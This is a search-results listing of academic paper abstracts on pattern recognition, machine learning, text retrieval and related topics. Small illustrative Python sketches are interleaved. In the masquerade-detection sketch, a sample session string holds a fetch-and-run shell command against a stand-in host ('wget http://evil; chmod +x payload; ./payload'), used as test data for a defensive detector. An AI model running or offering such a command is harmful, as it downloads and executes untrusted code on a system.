Showing 1 to 100 of 1641 matching Articles
By
Morales-Luna, Guillermo
1 Citation
We use a simple epistemic logic to pose problems related to relational database design. We use the notion of attribute dependencies, which is weaker than the notion of functional dependencies, to perform design tasks, since it satisfies the Armstrong axioms. We also discuss the application of the simple epistemic logic to privacy protection and to statistical disclosure.
By
Hannachi, Mohamed Amine; Bouassida Rodriguez, Ismael; Drira, Khalil; Pomares Hernandez, Saul Eduardo
2 Citations
Multilabelled graphs are a powerful and versatile tool for modelling real applications in diverse domains such as communication networks, social networks, and autonomic systems, among others. Due to the dynamic nature of such systems, the structure of the entities is continuously changing over time: new entities join the system, some of them leave it, or the entities’ relations change. This is where graph transformation plays an important role in modelling systems with dynamic and/or evolutive configurations. Graph transformation consists of two main tasks: graph matching and graph rewriting. At present, few graph transformation tools support multilabelled graphs. To our knowledge, there is no tool that supports inexact graph matching for the purpose of graph transformation. Moreover, the main problem of these tools lies in the limited expressiveness of the rewriting rules used, which reduces the range of application scenarios that can be modelled and/or increases the number of rewriting rules needed. In this paper, we present the tool GMTE, the Graph Matching and Transformation Engine. GMTE handles directed and multilabelled graphs. In addition to exact graph matching, GMTE handles inexact graph matching. The approach to rewriting rules used by GMTE combines Single Pushout rewriting rules with edNCE grammar. This combination enriches and extends the expressiveness of the graph rewriting rules. In addition, for graph matching, GMTE uses conditional rule schemata that support complex comparison functions over labels. To our knowledge, GMTE is the first graph transformation tool that offers such capabilities.
By
Ita, Guillermo; Bello, Pedro; Contreras, Meliza
Counting the models of a conjunctive form with two literals per clause (the #2SAT problem) is a classic #P-complete problem. We determine different structural patterns on the underlying graph of a 2CF F that allow the efficient computation of #2SAT(F).
We show that if the constraint graph of a formula is acyclic, or the cycles on the graph can be arranged as independent and embedded cycles, then the number of models of F can be counted efficiently.
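As a point of reference for such structural methods, #2SAT can always be solved by brute force in O(2^n) time. The sketch below is only this exhaustive baseline, not the paper's efficient algorithm; the literal encoding (signed integers, variables numbered from 1) is an assumption for illustration:

```python
from itertools import product

def count_2sat_models(n_vars, clauses):
    """Count satisfying assignments of a 2-CNF formula by exhaustive
    enumeration. A literal is a signed int: +i means variable i is
    true, -i means variable i is false (variables numbered from 1)."""
    count = 0
    for assignment in product([False, True], repeat=n_vars):
        def holds(lit):
            value = assignment[abs(lit) - 1]
            return value if lit > 0 else not value
        if all(holds(a) or holds(b) for a, b in clauses):
            count += 1
    return count

# F = (x1 or x2) and (not x1 or x3): an acyclic constraint graph.
print(count_2sat_models(3, [(1, 2), (-1, 3)]))  # 4
```

Efficient counting exploits the constraint graph's structure precisely to avoid this exponential enumeration.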
By
Alba-Cabrera, Eduardo; Ibarra-Fiallo, Julio; Godoy-Calderon, Salvador; Cervantes-Alonso, Fernando
1 Citation
The last few years have seen an important increase in research publications dealing with external typical testor-finding algorithms, while internal ones have been almost forgotten, or modified to behave as external ones, on the basis of their alleged poor performance. In this research we present a new internal typical testor-finding algorithm, called YYC, that incrementally calculates typical testors for the currently analyzed set of basic matrix rows by searching for compatible sets. The experimentally measured performance of this algorithm stands out favorably in problems where external algorithms show very low performance. Also, a comparative analysis of its efficiency is carried out against some external typical testor-finding algorithms published during the last few years.
By
Rendón, Erendira; Sánchez, José Salvador
2 Citations
Clustering in data mining is a discovery process that groups a set of data so as to maximize the intra-cluster similarity and to minimize the inter-cluster similarity. Clustering becomes more challenging when data are categorical and the amount of available memory is less than the size of the data set. In this paper, we introduce CBC (Clustering Based on Compressed Data), an extension of the BIRCH algorithm whose main characteristics are that it is especially suitable for very large databases and that it can work with both categorical attributes and mixed features. The effectiveness and performance of the CBC procedure were compared with those of the well-known K-modes clustering algorithm, demonstrating that the CBC summary process does not affect the final clustering, while execution times can be drastically lessened.
By
García, Vicente; Mollineda, Ramón A.; Sánchez, J. Salvador
2 Citations
In this paper, we introduce a new approach to evaluate and visualize classifier performance in two-class imbalanced domains. This method defines a two-dimensional space by combining the geometric mean of the class accuracies and a new metric that indicates how balanced they are. A given point in this space represents a certain trade-off between those two measures, which is expressed as a trapezoidal function. Besides, this evaluation function has the interesting property that it makes it possible to emphasize correct predictions on the minority class, which is often considered the most important class. Experiments demonstrate the consistency and validity of the proposed evaluation method.
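A minimal sketch of the two kinds of measure such a space could combine: the geometric mean of the per-class accuracies, and a signed balance indicator. The paper's actual balance metric and trapezoidal function are its own; the simple `tpr - tnr` difference used here is only an illustrative stand-in:

```python
import math

def two_class_rates(y_true, y_pred, positive):
    """Per-class accuracies for a two-class problem: the accuracy on
    the positive (often minority) class and on the negative class."""
    tp = sum(1 for t, p in zip(y_true, y_pred) if t == positive and p == positive)
    tn = sum(1 for t, p in zip(y_true, y_pred) if t != positive and p != positive)
    pos = sum(1 for t in y_true if t == positive)
    neg = len(y_true) - pos
    return tp / pos, tn / neg

def gmean_and_balance(tpr, tnr):
    """Geometric mean of the class accuracies plus a simple signed
    balance indicator (positive when the minority class is favored)."""
    return math.sqrt(tpr * tnr), tpr - tnr

tpr, tnr = two_class_rates([1, 1, 0, 0], [1, 0, 0, 0], positive=1)
print(gmean_and_balance(tpr, tnr))  # (0.7071067811865476, -0.5)
```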
By
Quintana, Ma. Guadalupe; Morales, Rafael
We present results of using inductive logic programming (ILP) to produce learner models by behavioural cloning. Models obtained using a program for supervised induction of production rules (ripper) are compared to models generated using a well-known program for ILP (foil). It is shown that the models produced by foil are either too specific or too general, depending on whether or not auxiliary relations are applied. Three possible explanations for these results are: (1) there is no way of specifying to foil the minimum number of cases each clause must cover; (2) foil requires that all auxiliary relations be defined extensionally; and (3) the application domain (control of a pole on a cart) has continuous attributes. In spite of foil’s limitations, the models it produced using auxiliary relations meet one of the goals of our exploration: to obtain more structured learner models which are easier to comprehend.
By
Solorio-Fernández, Saúl; Carrasco-Ochoa, J. Ariel; Martínez-Trinidad, José Fco.
4 Citations
In this paper, we introduce a new hybrid filter-wrapper method for supervised feature selection, based on Laplacian Score ranking combined with a wrapper strategy. We propose to rank features with the Laplacian Score to reduce the search space, and then use this order to find the best feature subset. We compare our method against other ranking-based feature selection methods, namely Information Gain Attribute Ranking, Relief, and Correlation-based Feature Selection; additionally, we include a Wrapper Subset Evaluation method in our comparison. Empirical results over ten real-world datasets from the UCI repository show that our hybrid method is competitive and, in most cases, outperforms the other feature selection methods used in our experiments.
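The general rank-then-wrap scheme can be sketched as follows. This is a simplified illustration: `variance_score` is a stand-in for the Laplacian Score, and the wrapper uses a leave-one-out 1-NN evaluation rather than the classifiers used in the paper:

```python
def variance_score(X, j):
    """Filter score for feature j (a stand-in for the Laplacian Score)."""
    col = [row[j] for row in X]
    m = sum(col) / len(col)
    return sum((v - m) ** 2 for v in col) / len(col)

def loo_1nn(X, y, feats):
    """Wrapper evaluation: leave-one-out accuracy of a 1-NN classifier
    restricted to the given feature subset."""
    if not feats:
        return 0.0
    correct = 0
    for i in range(len(X)):
        dists = [(sum((X[i][j] - X[k][j]) ** 2 for j in feats), k)
                 for k in range(len(X)) if k != i]
        correct += y[min(dists)[1]] == y[i]
    return correct / len(X)

def rank_then_wrap(X, y, score, evaluate):
    """Hybrid filter-wrapper sketch: rank features by the filter score,
    then keep each feature (in rank order) only if it improves the
    wrapper evaluation of the current subset."""
    order = sorted(range(len(X[0])), key=lambda j: score(X, j), reverse=True)
    subset, best = [], 0.0
    for j in order:
        acc = evaluate(X, y, subset + [j])
        if acc > best:
            subset, best = subset + [j], acc
    return subset, best

X = [[0.0, 5.0], [0.1, 5.0], [1.0, 5.0], [0.9, 5.0]]
y = [0, 0, 1, 1]
print(rank_then_wrap(X, y, variance_score, loo_1nn))  # ([0], 1.0)
```

The ranking step keeps the wrapper search linear in the number of features instead of exponential, which is the point of the hybrid design.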
By
Santiago-Ramirez, Everardo; Gonzalez-Fraga, J. A.; Ascencio-Lopez, J. I.
2 Citations
In this paper, we compare the performance of three composite correlation filters on a facial recognition problem. We used the ORL (Olivetti Research Laboratory) facial image database to evaluate the performance of the K-Law, MACE and ASEF filters. Simulation results demonstrate that the K-Law nonlinear composite filters show the best performance in terms of recognition rate (RR) and false acceptance rate (FAR). As a result, we observe that correlation filters are able to work well even when the facial image contains distortions such as rotation, partial occlusion and different illumination conditions.
By
Acevedo, Elena; Acevedo, Antonio; Felipe, Federico
2 Citations
A method for diagnosing Parkinson’s disease is presented. The proposal is based on an associative approach, and we used this method for classifying patients with Parkinson’s disease and those who are completely healthy. In particular, an Alpha-Beta Bidirectional Associative Memory is used together with the modified Johnson-Möbius codification in order to deal with mixed noise. We used three methods for testing the performance of our method: Leave-One-Out, Hold-Out and K-fold Cross-Validation, and the average accuracy obtained was 97.17%.
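The modified Johnson-Möbius codification is commonly described as a unary-style binary code over a set of non-negative integers; the sketch below follows that common description and may differ in detail from the exact variant used in the paper:

```python
def johnson_mobius(values):
    """Modified Johnson-Mobius codification (as commonly described for
    Alpha-Beta associative memories): each non-negative integer x in the
    set is coded as (m - x) zeros followed by x ones, where m is the
    maximum value in the set. All codewords have the same length m."""
    m = max(values)
    return ['0' * (m - x) + '1' * x for x in values]

print(johnson_mobius([3, 1, 4]))  # ['0111', '0001', '1111']
```

Because a change of one unit in the value flips exactly one bit, this coding turns additive noise in the data into low-weight bit noise, which is what the associative memory is designed to tolerate.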
By
Cruz-Barbosa, Raúl; Bautista-Villavicencio, David; Vellido, Alfredo
The diagnostic classification of human brain tumours on the basis of magnetic resonance spectra is a non-trivial problem in which dimensionality reduction is almost mandatory. This may take the form of feature selection or feature extraction. In feature extraction using manifold learning models, multivariate data are described through a low-dimensional manifold embedded in data space. Similarities between points along this manifold are best expressed as geodesic distances or their approximations. These approximations can be computationally intensive, and several alternative software implementations have been recently compared in terms of computation times. The current brief paper extends this research to investigate the comparative ability of dimensionality-reduced data descriptions to accurately classify several types of human brain tumours. The results suggest that the way in which the underlying data manifold is constructed in nonlinear dimensionality reduction methods strongly influences the classification results.
By
Pérez-Alfonso, Damián; Fundora-Ramírez, Osiel; Lazo-Cortés, Manuel S.; Roche-Escobar, Raciel
Process mining is concerned with the extraction of knowledge about business processes from information system logs. Process discovery algorithms are process mining techniques focused on discovering process models starting from event logs. The applicability and effectiveness of process discovery algorithms rely on features of event logs and process characteristics. Selecting a suitable algorithm for an event log is a tough task due to the variety of variables involved in this process. Traditional approaches use empirical assessment in order to recommend a suitable discovery algorithm; this is a time-consuming and computationally expensive approach. The present paper evaluates the usefulness of a classification-based approach to recommending discovery algorithms. A knowledge base was constructed, based on features of event logs and process characteristics, in order to train the classifiers. Experimental results obtained with the classifiers demonstrate the usefulness of the proposal for the recommendation of discovery algorithms.
By
Ledeneva, Yulia
The task of extractive summarization consists in producing a text summary by extracting a subset of text segments, such as sentences, and concatenating them to form a summary of the original text. The selection of sentences is based on terms they contain, which can be single words or multiword expressions. In a previous work, we have suggested so-called Maximal Frequent Sequences as such terms. In this paper, we investigate the effect of preprocessing on the process of selecting such sequences. Our results suggest that the accuracy of the method is, contrary to expectations, not seriously affected by preprocessing—which is both bad and good news, as we show.
By
García-Hernández, René Arnulfo; Ledeneva, Yulia
4 Citations
Extractive text summarization consists in selecting the most important units (normally sentences) from the original text, but it should be done as closely as possible to the way humans do it. Several interesting automatic approaches have been proposed for this task, but some of them focus on getting a better result rather than on making assumptions about what humans use when producing a summary. In this research, not only are competitive results obtained, but some assumptions are also drawn about what humans try to represent in a summary. To reach this objective, a genetic algorithm is proposed, with special emphasis on the fitness function, which permits drawing some conclusions.
By
Villatoro-Tello, Esaú; Villaseñor-Pineda, Luis; Montes-y-Gómez, Manuel
1 Citation
Recent evaluation results from Geographic Information Retrieval (GIR) indicate that current information retrieval methods are effective at retrieving relevant documents for geographic queries, but have severe difficulties generating a pertinent ranking of them. Motivated by these results, in this paper we present a novel re-ranking method, which employs information obtained through a relevance feedback process to perform a ranking refinement. Experiments show that the proposed method improves the ranking generated by a traditional IR engine, as well as the results of traditional re-ranking strategies such as query expansion via relevance feedback.
By
Coello Coello, Carlos A.
3 Citations
This paper provides a brief introduction to the so-called multi-objective evolutionary algorithms, which are bio-inspired metaheuristics designed to deal with problems having two or more (normally conflicting) objectives. First, we provide some basic concepts related to multi-objective optimization and a brief review of approaches available in the specialized literature. Then, we provide a short review of applications of multi-objective evolutionary algorithms in pattern recognition. In the final part of the paper, we suggest some possible paths for future research in this area which are, from the author’s perspective, promising.
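The core concept these algorithms build on is Pareto dominance. A minimal sketch for minimization problems, where the non-dominated solutions form the Pareto front the algorithms approximate:

```python
def dominates(a, b):
    """True if objective vector a Pareto-dominates b (minimization):
    a is no worse in every objective and strictly better in at least one."""
    return all(x <= y for x, y in zip(a, b)) and any(x < y for x, y in zip(a, b))

def non_dominated(points):
    """The Pareto front of a set of objective vectors."""
    return [p for p in points if not any(dominates(q, p) for q in points)]

pts = [(1, 5), (2, 2), (4, 1), (3, 3)]
print(non_dominated(pts))  # [(1, 5), (2, 2), (4, 1)]
```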
By
Gelbukh, Alexander; Sidorov, Grigori
1 Citation
Parallel text alignment is a special type of pattern recognition task aimed at discovering the similarity between two sequences of symbols. Given the same text in two different languages, the task is to decide which elements—paragraphs, in the case of paragraph alignment—in one text are translations of which elements of the other text. One of the applications is training statistical machine translation algorithms. The task is not trivial unless detailed text understanding can be afforded. In our previous work we presented a simple technique that relies on bilingual dictionaries but does not perform any syntactic analysis of the texts. In this paper we give a formal definition of the task and present an exact optimization algorithm for finding the best alignment.
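An exact alignment can be found with dynamic programming. The sketch below aligns paragraphs by length similarity only (the actual method additionally uses bilingual dictionaries); the fixed `gap` penalty for leaving a paragraph unaligned is an illustrative assumption:

```python
def align_paragraphs(src_lens, tgt_lens, gap=2.0):
    """Length-based alignment sketch: dynamic programming over
    (match, skip-source, skip-target) operations. The cost of a 1-1
    match is the relative length difference of the two paragraphs."""
    n, m = len(src_lens), len(tgt_lens)
    INF = float('inf')
    cost = [[INF] * (m + 1) for _ in range(n + 1)]
    back = [[None] * (m + 1) for _ in range(n + 1)]
    cost[0][0] = 0.0
    for i in range(n + 1):
        for j in range(m + 1):
            if cost[i][j] == INF:
                continue
            if i < n and j < m:
                c = abs(src_lens[i] - tgt_lens[j]) / max(src_lens[i], tgt_lens[j])
                if cost[i][j] + c < cost[i + 1][j + 1]:
                    cost[i + 1][j + 1] = cost[i][j] + c
                    back[i + 1][j + 1] = (i, j, 'match')
            if i < n and cost[i][j] + gap < cost[i + 1][j]:
                cost[i + 1][j] = cost[i][j] + gap
                back[i + 1][j] = (i, j, 'skip-src')
            if j < m and cost[i][j] + gap < cost[i][j + 1]:
                cost[i][j + 1] = cost[i][j] + gap
                back[i][j + 1] = (i, j, 'skip-tgt')
    pairs, i, j = [], n, m          # recover the 1-1 pairs
    while back[i][j]:
        pi, pj, op = back[i][j]
        if op == 'match':
            pairs.append((pi, pj))
        i, j = pi, pj
    return pairs[::-1]

print(align_paragraphs([100, 20, 50], [110, 18, 55]))  # [(0, 0), (1, 1), (2, 2)]
```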
By
Peña Ayala, Alejandro; Sossa, Humberto
In this paper, an approach oriented to acquiring, depicting, and administering knowledge about the student is proposed. Moreover, content is also characterized to describe lectures. In addition, the work focuses on the semantics of the attributes that reveal a profile of the student and the teaching experiences. The meaning of such properties is stated as an ontology; thus, inheritance and causal inferences are made. According to the semantics of the attributes and the conclusions induced, the sequencing module of a Web-based educational system (WBES) delivers the appropriate lecture option to students. The underlying hypothesis is: the apprenticeship of students is enhanced when a WBES understands the nature of the content and the student’s characteristics. Based on the empirical evidence produced by a trial, it is concluded that successful WBESs take into account the knowledge that describes their students and lectures.
By
López, Juan Carlos; Monroy, Raúl
The inductive approach [1] has been successfully used for verifying a number of security protocols, uncovering hidden assumptions. Yet it requires a high level of skill to use: a user must guide the proof process, selecting the tactic to be applied, inventing a key lemma, etc. This paper suggests that a proof planning approach [2] can provide automation in the verification of security protocols using the inductive approach. Proof planning uses AI techniques to guide theorem provers; it has been successfully applied in formal methods for software development. Using inductive proof planning [3], we have written a method which takes advantage of the differences in term structure introduced by rule induction, a chief inference rule in the inductive approach. Using difference matching [4], our method first identifies the differences between a goal and the associated hypotheses. Then, using rippling [5], the method attempts to remove such differences. We have successfully conducted a number of experiments using HOL-Clam [6], a socket-based link that combines the HOL theorem prover [7] and the Clam proof planner [8]. While this paper’s key contribution centres around a new insight into structuring the proof of some security theorems, it also reports on the development of the inductive approach within the HOL system.
By
Pérez, Cynthia B.; Olague, Gustavo; Fernandez, Francisco; Lutton, Evelyne
2 Citations
This work presents an evolutionary approach to improving the infection algorithm for solving the problem of dense stereo matching. Dense stereo matching is used for 3D reconstruction in stereo vision in order to achieve fine texture detail about a scene. The algorithm presented in this paper incorporates two different epidemic automata applied to the correspondence of two images. These two epidemic automata provide two different behaviours, each of which constructs a different matching. Our aim is to provide a new strategy inspired by evolutionary computation, which combines the behaviours of both automata into a single correspondence process. The new algorithm decides which epidemic automaton to use based on inheritance and mutation, as well as on the attributes, texture and geometry, of the input images. Finally, we show experiments on a real stereo pair to demonstrate how the new algorithm works.
By
Ritter, Gerhard X.; Urcid, Gonzalo
This paper presents an overview of the current status of lattice-based dendritic computing. Roughly speaking, lattice-based dendritic computing refers to a biomimetic approach to artificial neural networks whose computational aspects are based on lattice group operations. We begin our presentation by discussing some important processes of biological neurons followed by a biomimetic model which implements these processes. We discuss the reasons and rationale behind this approach and illustrate the methodology with some examples. Global activities in this field as well as some potential research issues are also part of this discussion.
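The basic lattice operation replaces the weighted sum of a classical neuron with a max (or min) of additions. A minimal single-neuron sketch of this idea, greatly simplified with respect to the full dendritic model in the paper:

```python
def lattice_neuron(x, w, use_max=True):
    """A single lattice-algebra neuron: instead of the weighted sum of a
    classical perceptron, it computes the max (or min) of inputs plus
    weights, the basic operation in lattice-based computing."""
    combined = [xi + wi for xi, wi in zip(x, w)]
    return max(combined) if use_max else min(combined)

print(lattice_neuron([1, 5, 2], [0, -3, 1]))                 # 3
print(lattice_neuron([1, 5, 2], [0, -3, 1], use_max=False))  # 1
```

In the dendritic model, several such max/min terms are combined per dendrite, which is what gives the networks their ability to carve out arbitrary decision regions.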
By
Olvera-López, J. Arturo; Martínez-Trinidad, J. Francisco; Carrasco-Ochoa, J. Ariel
3 Citations
Object selection is an important task for instance-based classifiers, since through this process the size of a training set can be reduced, which in turn reduces the runtimes of both the classification and training steps. Several methods for object selection have been proposed, but some of them discard objects that are relevant for the classification step. In this paper, we propose an object selection method based on the idea of sequential floating search. This method reconsiders the inclusion of relevant objects previously discarded. Experimental results obtained by our method are shown and compared against those of other object selection methods.
By
Posadas, Román; Mex-Perera, Carlos; Monroy, Raúl; Nolazco-Flores, Juan
6 Citations
This paper focuses on the study of a new method for detecting masqueraders in computer systems. The main feature of such masqueraders is that they have knowledge about the behavior profile of legitimate users. The dataset provided by Schonlau et al. [1], called SEA, has been modified to include synthetic sessions created by masqueraders using the behavior profile of the users they intend to impersonate. We propose a hybrid method for the detection of masqueraders based on the compression of the users’ sessions and Hidden Markov Models. The performance of the proposed method is evaluated using ROC curves and compared against other known methods. As shown by our experimental results, the proposed detection mechanism is the best of the methods considered here.
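The compression half of such a hybrid can be illustrated with a standard compressor: a session that resembles the user's profile adds few bytes when compressed together with it. This sketch uses zlib and invented command strings; it is not the paper's exact detector, which also involves Hidden Markov Models:

```python
import zlib

def compression_score(profile, session):
    """Compression-based masquerade score: the number of extra
    compressed bytes the session adds on top of the user's profile.
    Sessions similar to the profile compress well against it and
    therefore score low."""
    base = len(zlib.compress(profile.encode()))
    joint = len(zlib.compress((profile + session).encode()))
    return joint - base

profile = "ls; cd src; make; ls; cd ..; make test; " * 30
normal = "ls; cd src; make; ls;"
masquerade = "wget http://evil; chmod +x payload; ./payload"
print(compression_score(profile, normal), compression_score(profile, masquerade))
```

The masquerade session should receive the clearly larger score, since its commands introduce material the compressor has never seen in the profile.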
By
Oca, Víctor Montes; Torres, Miguel; Levachkine, Serguei; Moreno, Marco
In this paper, we propose the use of a knowledge-based system, implemented in SWI-Prolog, to approach the automatic description of spatial data by means of logic rules. The process of establishing the predicates is based on the topological and geometrical analysis of spatial data. These predicates are handled by a set of rules, which are used to find the relations between geospatial objects. Moreover, the rules aid in the search for the several features that compose the partition of topographic maps. For instance, when one road intersects another, a connection relation exists between the different destinations that can be accessed by these roads; furthermore, the rules help us to know each possible access for this case. Therefore, this description assists in the tasks of geospatial data interpretation (map description) in order to provide quality information for spatial decision support systems.
By
Gutiérrez, Francisco J.; Lerma-Rascón, Margarita M.; Salgado-Garza, Luis R.; Cantú, Francisco J.
3 Citations
Biometrics is the field that differentiates among people based on their unique biological and physiological patterns, such as the retina, fingerprints, DNA and keyboard typing patterns, to name a few. Keystroke Dynamics is a physiological biometric that measures the unique typing rhythm and cadence of a computer keyboard user. This paper presents a Data Mining-based Keystroke Dynamics application for identity verification, and it reports the results of experiments comparing different approaches to Keystroke Dynamics. The methods compared were Decision Trees, a Naïve Bayesian Classifier, Memory Based Learning, and statistics-based Keystroke Dynamics.
By
Batyrshin, Ildar; Solovyev, Valery
2 Citations
The paper introduces new time series shape association measures based on Euclidean distance. A method for analyzing associations between time series, based on the separate analysis of positively and negatively associated local trends, is discussed. Examples of applying the proposed measures and methods to the analysis of associations between historical prices of securities obtained from Google Finance are considered. An example of time series with inverse associations between them is discussed.
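One simple way to score local-trend association, offered as an illustration rather than as the paper's exact measure: compare the signs of successive increments of the two series, so that inversely associated series score negatively:

```python
def trend_association(x, y):
    """Local-trend association sketch: the fraction of time steps where
    the two series move in the same direction, minus the fraction where
    they move in opposite directions; the result lies in [-1, 1]."""
    same = opposite = 0
    for i in range(1, len(x)):
        dx, dy = x[i] - x[i - 1], y[i] - y[i - 1]
        if dx * dy > 0:
            same += 1
        elif dx * dy < 0:
            opposite += 1
    return (same - opposite) / (len(x) - 1)

a = [1, 2, 3, 2, 4]
print(trend_association(a, a))                # 1.0
print(trend_association(a, [-v for v in a]))  # -1.0
```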
By
Aguilar-González, Pablo M.; Kober, Vitaly
1 Citation
Correlation filters for object detection and location estimation are commonly designed assuming that the shape and gray-level structure of the object of interest are explicitly available. In this work we propose the design of correlation filters when the appearance of the target is given in a single training image. The target is assumed to be embedded in a cluttered background, and the image is assumed to be corrupted by additive sensor noise. The designed filters are used to detect the target in an input scene modeled by the non-overlapping signal model. An optimal correlation filter, with respect to the peak-to-output energy ratio criterion, is proposed for object detection and location estimation. We also present estimation techniques for the required parameters. Computer simulation results obtained with the proposed filters are presented and compared with those of common correlation filters.
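The detection principle can be sketched in one dimension: correlate a zero-mean version of the target with the scene and take the correlation peak as the location estimate. This toy example ignores the noise model and the optimal-filter design discussed in the paper:

```python
def correlate(signal, template):
    """Sliding cross-correlation of a zero-mean template with a 1-D
    signal; the index of the correlation peak estimates the target
    position."""
    m = sum(template) / len(template)
    t = [v - m for v in template]            # zero-mean template
    return [sum(s * w for s, w in zip(signal[i:i + len(template)], t))
            for i in range(len(signal) - len(template) + 1)]

target = [0, 3, 5, 3, 0]
scene = [1, 1, 1, 1, 0, 3, 5, 3, 0, 1, 1]   # target embedded at index 4
scores = correlate(scene, target)
print(scores.index(max(scores)))  # 4
```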
By
Hernández-Rodríguez, Selene; Carrasco-Ochoa, J. A.; Martínez-Trinidad, J. Fco.
The k nearest neighbor (k-NN) classifier has been extensively used as a nonparametric technique in Pattern Recognition. However, in some applications where the training set is large, the exhaustive k-NN classifier becomes impractical; therefore, many fast k-NN classifiers have been developed to avoid this problem. Most of these classifiers rely on metric properties, usually the triangle inequality, to reduce the number of prototype comparisons. However, in the soft sciences, prototypes are usually described by qualitative and quantitative features (mixed data), and sometimes the comparison function does not satisfy the triangle inequality. Therefore, in this work, a fast k most similar neighbor (k-MSN) classifier, which uses a tree structure and an Approximating and Eliminating approach for mixed data not based on metric properties (Tree AEMD), is introduced. The proposed classifier is compared against other fast k-NN classifiers.
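A minimal illustration of classification with a non-metric mixed-data comparison function, using exhaustive search rather than the tree-based elimination the paper introduces; the dissimilarity below is a simple stand-in:

```python
def mixed_dissimilarity(a, b):
    """Dissimilarity for mixed data: absolute difference on numeric
    features, 0/1 mismatch on categorical ones. Such functions need
    not satisfy the triangle inequality."""
    d = 0.0
    for x, y in zip(a, b):
        if isinstance(x, (int, float)) and isinstance(y, (int, float)):
            d += abs(x - y)
        else:
            d += 0.0 if x == y else 1.0
    return d

def k_most_similar(query, prototypes, labels, k=1):
    """Exhaustive k-most-similar-neighbour classification by majority
    vote among the k least dissimilar prototypes."""
    ranked = sorted(zip(prototypes, labels),
                    key=lambda p: mixed_dissimilarity(query, p[0]))
    votes = [lab for _, lab in ranked[:k]]
    return max(set(votes), key=votes.count)

protos = [(1.0, 'red'), (1.2, 'red'), (5.0, 'blue')]
print(k_most_similar((1.1, 'red'), protos, ['A', 'A', 'B'], k=1))  # A
```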
By
Kuri-Morales, Angel; Cortés-Arce, Iván
Computer networks are usually balanced by appealing to personal experience and heuristics, without taking advantage of the behavioral patterns embedded in their operation. In this work we report the application of computational intelligence tools to find such patterns and take advantage of them to improve the network’s performance. The traditional traffic flow of a computer network is improved by the concatenated use of the following “tools”: a) applying intelligent agents, b) forecasting the traffic flow of the network via Multi-Layer Perceptrons (MLPs), and c) optimizing the forecasted network’s parameters with a genetic algorithm. We discuss the implementation and experimentally show that each consecutive new tool introduced improves the behavior of the network. This incremental improvement can be explained from the characterization of the network’s dynamics as a set of patterns emerging in time.
By
Rosales-Pérez, Alejandro; Reyes-García, Carlos A.; Gonzalez, Jesus A.; Arch-Tirado, Emilio
3 Citations
In recent years, infant cry recognition has been of particular interest because the cry contains useful information to determine whether the infant is hungry, is in pain, or has a particular disease. Several studies have been performed in order to differentiate between these kinds of cries. In this work, we propose to use Genetic Selection of a Fuzzy Model (GSFM) for the classification of infant cries. GSFM selects the combination of feature selection methods, type of fuzzy processing, learning algorithm, and its associated parameters that best fits the data. The experiments demonstrate the feasibility of this technique for the classification task. Our experimental results reach up to 99.42% accuracy.
By
Gómez-Soriano, José Manuel; Montes-y-Gómez, Manuel; Sanchis-Arnal, Emilio; Villaseñor-Pineda, Luis; Rosso, Paolo
3 Citations
Passage Retrieval (PR) is typically used as the first step in current Question Answering (QA) systems. Most methods are based on the vector space model, which allows finding relevant passages for general user needs but fails at selecting pertinent passages for specific user questions. This paper describes a simple PR method specially suited for the QA task. This method considers the structure of the question, favoring the passages that contain the longest n-gram structures from the question. Experimental results of this method on Spanish, French and Italian show that this approach can be useful for multilingual question answering systems.
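A rough sketch of structure-aware passage scoring: count the question's n-grams that appear in each passage, weighting longer n-grams more heavily. The linear weighting used here is a guess for illustration, not the paper's actual model:

```python
def ngrams(tokens, n):
    """The set of n-grams of a token list."""
    return {tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1)}

def passage_score(question, passage, max_n=3):
    """Score a passage by the question n-grams it contains, weighting
    each shared n-gram by its length n."""
    q, p = question.lower().split(), passage.lower().split()
    return sum(n * len(ngrams(q, n) & ngrams(p, n)) for n in range(1, max_n + 1))

question = "who invented the telephone"
passages = ["the telephone was invented by Bell",
            "a phone book lists numbers"]
print(max(passages, key=lambda p: passage_score(question, p)))
# the telephone was invented by Bell
```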
By
Escalera, Sergio; Baró, Xavier; Gonzàlez, Jordi; Bautista, Miguel A.; Madadi, Meysam; Reyes, Miguel; Ponce-López, Víctor; Escalante, Hugo J.; Shotton, Jamie; Guyon, Isabelle
13 Citations
This paper summarizes the ChaLearn Looking at People 2014 challenge data and the results obtained by the participants. The competition was split into three independent tracks: human pose recovery from RGB data, action and interaction recognition from RGB data sequences, and multimodal gesture recognition from RGB-Depth sequences. For all the tracks, the goal was to perform user-independent recognition in sequences of continuous images, using the overlapping Jaccard index as the evaluation measure. In this edition of the ChaLearn challenge, two large novel data sets were made publicly available, and the Microsoft Codalab platform was used to manage the competition. Outstanding results were achieved in the three challenge tracks, with accuracy results of 0.20, 0.50, and 0.85 for pose recovery, action/interaction recognition, and multimodal gesture recognition, respectively.
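For a single predicted/ground-truth segment pair, the overlapping Jaccard index is intersection over union. A minimal sketch for 1-D frame intervals (the challenge applies this per class and per sequence, which this sketch omits):

```python
def jaccard(a, b):
    """Overlap (Jaccard index) between two intervals given as
    (start, end): length of the intersection divided by the length
    of the union. Disjoint intervals score 0."""
    inter = max(0, min(a[1], b[1]) - max(a[0], b[0]))
    union = max(a[1], b[1]) - min(a[0], b[0])
    return inter / union if union else 0.0

print(jaccard((10, 20), (15, 25)))  # 0.3333333333333333
```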
By
Coello Coello, Carlos A.
In this paper, we provide a general introduction to the so-called multi-objective evolutionary algorithms, which are metaheuristic search techniques inspired by natural evolution that are able to deal with highly complex optimization problems having two or more objectives. In the first part of the paper, we provide some basic concepts necessary to make the paper self-contained, as well as a short review of the most representative multi-objective evolutionary algorithms currently available in the specialized literature. After that, a short review of applications of these algorithms in pattern recognition is provided. The final part of the paper presents some possible future research paths in this area, as well as our conclusions.
By
Olmedo-Aguirre, José Oscar; Rosa, Mónica Rivera; Morales-Luna, Guillermo
System modeling, analysis and visualization are becoming common practice in the design of distributed intelligent systems since the wide adoption of the Unified Modeling Language (UML). However, UML cannot describe important behavioral properties such as context awareness, as required for ubiquitous computing. In this paper, we present Context-Aware UML Sequence diagrams (CA UMLS), an experimental visual programming language that extends UML sequence diagrams with data/object spaces to represent computational context awareness. The programming language provides the means to describe the event-condition-action (ECA) rules that govern complex nomadic user behavior and to visualize their effect. The ECA rules are compiled into common concurrent programming abstractions by introducing structuring notions of object creation, synchronization, and communication, along with sequential and selective composition of simpler rules. The contribution of this work is in providing programming abstractions that facilitate the design of context-aware applications for ubiquitous and nomadic computing.
By
Sossa, Humberto; Garro, Beatriz A.; Villegas, Juan; Avilés, Carlos; Olague, Gustavo
